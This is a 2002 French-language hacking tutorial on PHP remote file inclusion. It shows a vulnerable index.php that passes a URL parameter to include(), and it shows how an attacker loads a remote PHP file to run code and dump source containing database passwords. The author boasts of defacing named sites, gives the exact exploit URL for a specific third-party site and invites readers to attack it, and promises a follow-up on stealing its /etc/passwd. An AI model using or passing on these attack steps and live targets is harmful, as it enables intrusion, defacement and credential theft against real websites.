voici le tutorial Promis sur la faille PHP, je pense avoir été assez clair, mais si vous avez des questions :) allez dans le forum ! je repond a toutes les questions . 
pour voir l'article cliquer sur la suite 

__________________________________________________________________



Sujet : Faille include sur PHP

Type : Tutorial

Auteur : Zib - http://ioupla.ref.as/coding ou http://belette.fr.st

Date : 7/05/02

Question Remarque : forum de http://belette.fr.st

__________________________________________________________________



C'est parti ! :)



Alors on commence par le debut 



______________ Rappel sur la fonction include :)__________________



en php pour inclure un fichier dans un autre 

on fait :




include("nom_du_fichier.txt");

?>



ca ressemble un peu au C/C++ lorsque l'on fait #include  

ou alors on peut aussi faire :




$url = "nom_du_fichier.txt"; // on se sert de la variable $url

include($url);

?>



ca revient au meme .



on peut aussi faire :




include("http://www.google.fr/index.html");

?>



dans ce cas on incluera la page de google (le code html de index 

sera ajouter a votre script)



deuxieme cas on peut aussi faire :




include("http://www.tonsite.com/ton_fichier.txt");

?>



deplus si le fichier commence par br


et fini par br

?>br

cela sera considerer comme du code .br

br

br

________ Fin du rappel __________________________



Maintenant imaginons un webmaster qui fasse sur son site un 

script index.php du type :


if($url) {  			// si url est defini

	include($url); 		// on inclue la valeur contenu 

				// dans $url

}

else {

	include("accueil.php"); // si $url n'est pas defini on  

				// inclue accueil.php qui est 

				// disons le page par defaut

}

?>



lors de l'acces a la page d'accueil on aura :

http:/www.cible.com/index.php

le script n'ayant pas de parametre pour $url 

(je rappelle qu'un parametre se passe de la maniere suivante 

index.php?url=kdl ) il va inclure le fichier par defaut qui est 

accueil.php si on lui donne :

http://www.cible.com/index.php?url=contact.php

il va inclure si elle existe la page contact.php



et la on se commence a se frotter les mains !!

imaginons qu'un malintentionner fasse :

http://www.cible.com/index.php?url=http://www.url.com/ton_fichier.txt



cette personne va pouvoir executer n'importe quelle commande 

php grace a son fichier qui se trouve sur 

http://www.url.com/ton_fichier.txt



un exemple de fichier distant (sur votre site ) qui peut se reveler 

interessant :




show_source("index.php");

?>



ce fichier va afficher la source du fichier index.php de 

http://www.cible.com

ca peut etre interessant pour voir les mots de passes des bases 

de donner etc...( c'est un peu comme ca que j'ai defacer linux.fr 

ou unixtech.be car linux.fr hebergeait un webmaster qui ne s'est 

pas preocupé de la securité )



sacher que des fonction pour lister les repertoires existent ! 

je vais pas tout vous faire non plus :)

voila vous pourrez tester tout ca sur : http://www.spie.pl/



la faille se trouve la :

http://www.spie.pl/index.php?body=http://www.votresite.com/votrescript.txt



Ne foutez pas le bordel , j'ai encore un tuto a faire sur : comment 

j'ai recuperer le fichier /etc/passwd de www.spie.pl qui est assez 

interessant, enfin apres tout si ca vous interessa pas =)



voila Ciao :) 



__________________________________________________________________



Sujet : Faille include sur PHP

Type : Tutorial

Auteur : Zib - http://ioupla.ref.as/coding ou http://belette.fr.st

Date : 7/05/02

Question Remarque : forum de http://belette.fr.st

__________________________________________________________________